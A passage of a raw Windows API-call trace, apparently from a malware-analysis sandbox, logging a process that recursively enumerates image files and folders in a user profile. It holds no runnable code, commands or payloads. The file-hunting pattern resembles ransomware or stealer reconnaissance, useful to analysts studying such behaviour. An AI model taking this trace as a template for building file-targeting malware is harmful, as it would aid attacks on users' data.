cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.811] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ef9c8 | out: lpFindFileData=0x4ef9c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x787d4020, ftCreationTime.dwHighDateTime=0x1d5e01f, ftLastAccessTime.dwLowDateTime=0x53da78a0, ftLastAccessTime.dwHighDateTime=0x1d5e64b, ftLastWriteTime.dwLowDateTime=0x53da78a0, ftLastWriteTime.dwHighDateTime=0x1d5e64b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x200065, dwReserved1=0x88, cFileName="..", cAlternateFileName="")) returned 1 [0070.811] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.811] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ef9c8 | out: lpFindFileData=0x4ef9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa52e0ca0, ftCreationTime.dwHighDateTime=0x1d5e49b, ftLastAccessTime.dwLowDateTime=0x87b390f0, ftLastAccessTime.dwHighDateTime=0x1d5e44b, ftLastWriteTime.dwLowDateTime=0x87b390f0, ftLastWriteTime.dwHighDateTime=0x1d5e44b, nFileSizeHigh=0x0, nFileSizeLow=0x393c, dwReserved0=0x200065, dwReserved1=0x88, cFileName="8vwqILz24A.jpg", cAlternateFileName="8VWQIL~1.JPG")) returned 1 [0070.811] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.811] lstrlenW (lpString="8vwqILz24A.jpg") returned 14 [0070.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\Q_eBb\\*", lpFindFileData=0x4efc20 | out: lpFindFileData=0x4efc20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2e0cc40, ftCreationTime.dwHighDateTime=0x1d5e24d, ftLastAccessTime.dwLowDateTime=0x70cce310, ftLastAccessTime.dwHighDateTime=0x1d5db2b, ftLastWriteTime.dwLowDateTime=0x70cce310, ftLastWriteTime.dwHighDateTime=0x1d5db2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450059, dwReserved1=0x7e0054, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0070.811] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4efc20 | out: lpFindFileData=0x4efc20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2e0cc40, ftCreationTime.dwHighDateTime=0x1d5e24d, ftLastAccessTime.dwLowDateTime=0x70cce310, ftLastAccessTime.dwHighDateTime=0x1d5db2b, ftLastWriteTime.dwLowDateTime=0x70cce310, ftLastWriteTime.dwHighDateTime=0x1d5db2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450059, dwReserved1=0x7e0054, cFileName="..", cAlternateFileName="")) returned 1 [0070.811] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.811] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4efc20 | out: lpFindFileData=0x4efc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e0b84a0, ftCreationTime.dwHighDateTime=0x1d5d974, ftLastAccessTime.dwLowDateTime=0x2e6a48e0, ftLastAccessTime.dwHighDateTime=0x1d5e6ee, ftLastWriteTime.dwLowDateTime=0x2e6a48e0, ftLastWriteTime.dwHighDateTime=0x1d5e6ee, nFileSizeHigh=0x0, nFileSizeLow=0x9712, dwReserved0=0x450059, dwReserved1=0x7e0054, cFileName="FDBT5NNt9W8lKmc.jpg", cAlternateFileName="FDBT5N~1.JPG")) returned 1 [0070.811] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.812] lstrlenW (lpString="FDBT5NNt9W8lKmc.jpg") returned 19 [0070.812] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0070.812] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efc20 | out: hHeap=0x4a0000) returned 1 [0070.812] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ef9c8 | out: lpFindFileData=0x4ef9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22300070, ftCreationTime.dwHighDateTime=0x1d5df95, ftLastAccessTime.dwLowDateTime=0x64533f20, ftLastAccessTime.dwHighDateTime=0x1d5dff0, ftLastWriteTime.dwLowDateTime=0x64533f20, ftLastWriteTime.dwHighDateTime=0x1d5dff0, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x200065, dwReserved1=0x88, cFileName="Ryn1Z.png", cAlternateFileName="")) returned 1 [0070.812] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.812] lstrlenW (lpString="Ryn1Z.png") returned 9 [0070.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\*", lpFindFileData=0x4efc20 | out: lpFindFileData=0x4efc20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24778a60, ftCreationTime.dwHighDateTime=0x1d5dafe, ftLastAccessTime.dwLowDateTime=0x4b520f10, ftLastAccessTime.dwHighDateTime=0x1d5dc49, ftLastWriteTime.dwLowDateTime=0x4b520f10, ftLastWriteTime.dwHighDateTime=0x1d5dc49, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450059, dwReserved1=0x7e0054, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0070.812] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4efc20 | out: lpFindFileData=0x4efc20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24778a60, ftCreationTime.dwHighDateTime=0x1d5dafe, ftLastAccessTime.dwLowDateTime=0x4b520f10, ftLastAccessTime.dwHighDateTime=0x1d5dc49, ftLastWriteTime.dwLowDateTime=0x4b520f10, ftLastWriteTime.dwHighDateTime=0x1d5dc49, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450059, dwReserved1=0x7e0054, cFileName="..", cAlternateFileName="")) returned 1 [0070.812] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.812] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4efc20 | out: lpFindFileData=0x4efc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45946820, ftCreationTime.dwHighDateTime=0x1d5e478, ftLastAccessTime.dwLowDateTime=0xd7bc55e0, ftLastAccessTime.dwHighDateTime=0x1d5e703, ftLastWriteTime.dwLowDateTime=0xd7bc55e0, ftLastWriteTime.dwHighDateTime=0x1d5e703, nFileSizeHigh=0x0, nFileSizeLow=0xc8e8, dwReserved0=0x450059, dwReserved1=0x7e0054, cFileName="anikb6gG7bb0Y7wvRNp.gif", cAlternateFileName="ANIKB6~1.GIF")) returned 1 [0070.812] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.812] lstrlenW (lpString="anikb6gG7bb0Y7wvRNp.gif") returned 23 [0070.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67648360, ftCreationTime.dwHighDateTime=0x1d5e3f9, ftLastAccessTime.dwLowDateTime=0x47808350, ftLastAccessTime.dwHighDateTime=0x1d5e67e, ftLastWriteTime.dwLowDateTime=0x47808350, ftLastWriteTime.dwHighDateTime=0x1d5e67e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7b78 [0070.813] FindNextFileW (in: hFindFile=0x4d7b78, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67648360, ftCreationTime.dwHighDateTime=0x1d5e3f9, ftLastAccessTime.dwLowDateTime=0x47808350, ftLastAccessTime.dwHighDateTime=0x1d5e67e, ftLastWriteTime.dwLowDateTime=0x47808350, ftLastWriteTime.dwHighDateTime=0x1d5e67e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.813] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.813] FindNextFileW (in: hFindFile=0x4d7b78, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b78dfc0, ftCreationTime.dwHighDateTime=0x1d5dbcd, ftLastAccessTime.dwLowDateTime=0x39d08a90, ftLastAccessTime.dwHighDateTime=0x1d5e717, ftLastWriteTime.dwLowDateTime=0x39d08a90, ftLastWriteTime.dwHighDateTime=0x1d5e717, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bjArMd2", cAlternateFileName="")) returned 1 [0070.813] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.813] lstrlenW (lpString="bjArMd2") returned 7 [0070.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\*", lpFindFileData=0x4f02c8 | out: lpFindFileData=0x4f02c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b78dfc0, ftCreationTime.dwHighDateTime=0x1d5dbcd, ftLastAccessTime.dwLowDateTime=0x39d08a90, ftLastAccessTime.dwHighDateTime=0x1d5e717, ftLastWriteTime.dwLowDateTime=0x39d08a90, ftLastWriteTime.dwHighDateTime=0x1d5e717, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7bb8 [0070.813] FindNextFileW (in: hFindFile=0x4d7bb8, lpFindFileData=0x4f02c8 | out: lpFindFileData=0x4f02c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b78dfc0, ftCreationTime.dwHighDateTime=0x1d5dbcd, ftLastAccessTime.dwLowDateTime=0x39d08a90, ftLastAccessTime.dwHighDateTime=0x1d5e717, ftLastWriteTime.dwLowDateTime=0x39d08a90, ftLastWriteTime.dwHighDateTime=0x1d5e717, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.813] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.813] FindNextFileW (in: hFindFile=0x4d7bb8, lpFindFileData=0x4f02c8 | out: lpFindFileData=0x4f02c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79fdb170, ftCreationTime.dwHighDateTime=0x1d5e347, ftLastAccessTime.dwLowDateTime=0xfaccb100, ftLastAccessTime.dwHighDateTime=0x1d5d999, ftLastWriteTime.dwLowDateTime=0xfaccb100, ftLastWriteTime.dwHighDateTime=0x1d5d999, nFileSizeHigh=0x0, nFileSizeLow=0x34a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="GyaFVFmx.jpg", cAlternateFileName="")) returned 1 [0070.813] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.813] lstrlenW (lpString="GyaFVFmx.jpg") returned 12 [0070.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\*", lpFindFileData=0x508f58 | out: lpFindFileData=0x508f58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa515cb0, ftCreationTime.dwHighDateTime=0x1d5e59e, ftLastAccessTime.dwLowDateTime=0x1d646bd0, ftLastAccessTime.dwHighDateTime=0x1d5e72e, ftLastWriteTime.dwLowDateTime=0x1d646bd0, ftLastWriteTime.dwHighDateTime=0x1d5e72e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7bf8 [0070.814] FindNextFileW (in: hFindFile=0x4d7bf8, lpFindFileData=0x508f58 | out: lpFindFileData=0x508f58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa515cb0, ftCreationTime.dwHighDateTime=0x1d5e59e, ftLastAccessTime.dwLowDateTime=0x1d646bd0, ftLastAccessTime.dwHighDateTime=0x1d5e72e, ftLastWriteTime.dwLowDateTime=0x1d646bd0, ftLastWriteTime.dwHighDateTime=0x1d5e72e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.814] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.814] FindNextFileW (in: hFindFile=0x4d7bf8, lpFindFileData=0x508f58 | out: lpFindFileData=0x508f58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51f058c0, ftCreationTime.dwHighDateTime=0x1d5e312, ftLastAccessTime.dwLowDateTime=0xf44b0c50, ftLastAccessTime.dwHighDateTime=0x1d5dedf, ftLastWriteTime.dwLowDateTime=0xf44b0c50, ftLastWriteTime.dwHighDateTime=0x1d5dedf, nFileSizeHigh=0x0, nFileSizeLow=0x531e, dwReserved0=0x0, dwReserved1=0x0, cFileName="6HykKJsYIk6R.gif", cAlternateFileName="6HYKKJ~1.GIF")) returned 1 [0070.814] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.814] lstrlenW (lpString="6HykKJsYIk6R.gif") returned 16 [0070.814] FindClose (in: hFindFile=0x4d7bf8 | out: hFindFile=0x4d7bf8) returned 1 [0070.814] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x508f58 | out: hHeap=0x4a0000) returned 1 [0070.814] FindNextFileW (in: hFindFile=0x4d7bb8, lpFindFileData=0x4f02c8 | out: lpFindFileData=0x4f02c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27873c20, ftCreationTime.dwHighDateTime=0x1d5e7c7, ftLastAccessTime.dwLowDateTime=0x3bfb71e0, ftLastAccessTime.dwHighDateTime=0x1d5e069, ftLastWriteTime.dwLowDateTime=0x3bfb71e0, ftLastWriteTime.dwHighDateTime=0x1d5e069, nFileSizeHigh=0x0, nFileSizeLow=0x11c23, dwReserved0=0x0, dwReserved1=0x0, cFileName="X-dIzNFjhmqz2wLkOxi.bmp", cAlternateFileName="X-DIZN~1.BMP")) returned 1 [0070.814] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.814] lstrlenW (lpString="X-dIzNFjhmqz2wLkOxi.bmp") returned 23 [0070.814] FindClose (in: hFindFile=0x4d7bb8 | out: hFindFile=0x4d7bb8) returned 1 [0070.815] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f02c8 | out: hHeap=0x4a0000) returned 1 [0070.815] FindNextFileW (in: hFindFile=0x4d7b78, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46cc3f90, ftCreationTime.dwHighDateTime=0x1d5e17d, ftLastAccessTime.dwLowDateTime=0xed77ab60, ftLastAccessTime.dwHighDateTime=0x1d5e086, ftLastWriteTime.dwLowDateTime=0xed77ab60, ftLastWriteTime.dwHighDateTime=0x1d5e086, nFileSizeHigh=0x0, nFileSizeLow=0xb516, dwReserved0=0x0, dwReserved1=0x0, cFileName="C9OMdvdKnuBpRQ6Y.jpg", cAlternateFileName="C9OMDV~1.JPG")) returned 1 [0070.815] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.815] lstrlenW (lpString="C9OMdvdKnuBpRQ6Y.jpg") returned 20 [0070.815] FindClose (in: hFindFile=0x4d7b78 | out: hFindFile=0x4d7b78) returned 1 [0070.815] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.815] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4efc20 | out: lpFindFileData=0x4efc20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67648360, ftCreationTime.dwHighDateTime=0x1d5e3f9, ftLastAccessTime.dwLowDateTime=0x47808350, ftLastAccessTime.dwHighDateTime=0x1d5e67e, ftLastWriteTime.dwLowDateTime=0x47808350, ftLastWriteTime.dwHighDateTime=0x1d5e67e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x450059, dwReserved1=0x7e0054, cFileName="zR-GUQe-OgaHp2BiQ", cAlternateFileName="ZR-GUQ~1")) returned 0 [0070.815] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0070.815] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efc20 | out: hHeap=0x4a0000) returned 1 [0070.815] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ef9c8 | out: lpFindFileData=0x4ef9c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19e9b90, ftCreationTime.dwHighDateTime=0x1d5e1ee, ftLastAccessTime.dwLowDateTime=0xba3b58b0, ftLastAccessTime.dwHighDateTime=0x1d5e63e, ftLastWriteTime.dwLowDateTime=0xba3b58b0, ftLastWriteTime.dwHighDateTime=0x1d5e63e, nFileSizeHigh=0x0, nFileSizeLow=0x74c8, dwReserved0=0x200065, dwReserved1=0x88, cFileName="yyCgmbRbltuBs7fx.jpg", cAlternateFileName="YYCGMB~1.JPG")) returned 1 [0070.815] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.815] lstrlenW (lpString="yyCgmbRbltuBs7fx.jpg") returned 20 [0070.815] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.815] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef9c8 | out: hHeap=0x4a0000) returned 1 [0070.815] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x787d4020, ftCreationTime.dwHighDateTime=0x1d5e01f, ftLastAccessTime.dwLowDateTime=0x53da78a0, ftLastAccessTime.dwHighDateTime=0x1d5e64b, ftLastWriteTime.dwLowDateTime=0x53da78a0, ftLastWriteTime.dwHighDateTime=0x1d5e64b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="ZQCd1PT", cAlternateFileName="")) returned 0 [0070.815] FindClose (in: hFindFile=0x4d7ab8 | out: hFindFile=0x4d7ab8) returned 1 [0070.815] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0070.815] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0070.815] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.815] lstrlenW (lpString="PrintHood") returned 9 [0070.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d5d87b, ftLastAccessTime.dwLowDateTime=0x7c62b10, ftLastAccessTime.dwHighDateTime=0x1d5df90, ftLastWriteTime.dwLowDateTime=0x7c62b10, ftLastWriteTime.dwHighDateTime=0x1d5df90, nFileSizeHigh=0x0, nFileSizeLow=0x17319, dwReserved0=0x0, dwReserved1=0x0, cFileName="WR4O2FvxQyjiSwc.png", cAlternateFileName="WR4O2F~1.PNG")) returned 0xffffffff [0070.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.816] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Recent", cAlternateFileName="")) returned 1 [0070.816] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.816] lstrlenW (lpString="Recent") returned 6 [0070.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d5d87b, ftLastAccessTime.dwLowDateTime=0x7c62b10, ftLastAccessTime.dwHighDateTime=0x1d5df90, ftLastWriteTime.dwLowDateTime=0x7c62b10, ftLastWriteTime.dwHighDateTime=0x1d5df90, nFileSizeHigh=0x0, nFileSizeLow=0x17319, dwReserved0=0x0, dwReserved1=0x0, cFileName="WR4O2FvxQyjiSwc.png", cAlternateFileName="WR4O2F~1.PNG")) returned 0xffffffff [0070.816] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.816] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0070.816] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.816] lstrlenW (lpString="Saved Games") returned 11 [0070.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7ab8 [0070.816] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.816] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.816] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.816] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.817] lstrlenW (lpString="desktop.ini") returned 11 [0070.817] FindClose (in: hFindFile=0x4d7ab8 | out: hFindFile=0x4d7ab8) returned 1 [0070.822] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.822] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Searches", cAlternateFileName="")) returned 1 [0070.822] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.822] lstrlenW (lpString="Searches") returned 8 [0070.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7ab8 [0070.822] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.822] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.822] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.822] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.822] lstrlenW (lpString="desktop.ini") returned 11 [0070.822] FindClose (in: hFindFile=0x4d7ab8 | out: hFindFile=0x4d7ab8) returned 1 [0070.823] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.823] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 